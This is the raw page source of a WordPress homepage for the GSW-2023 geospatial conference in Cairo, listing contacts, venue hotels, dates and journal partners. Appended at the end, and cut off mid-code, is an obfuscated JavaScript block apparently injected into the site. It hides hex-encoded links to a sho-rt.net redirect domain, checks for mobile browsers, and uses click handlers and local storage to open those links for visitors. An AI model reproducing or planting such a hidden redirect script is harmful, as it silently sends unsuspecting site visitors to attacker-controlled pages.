/></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt 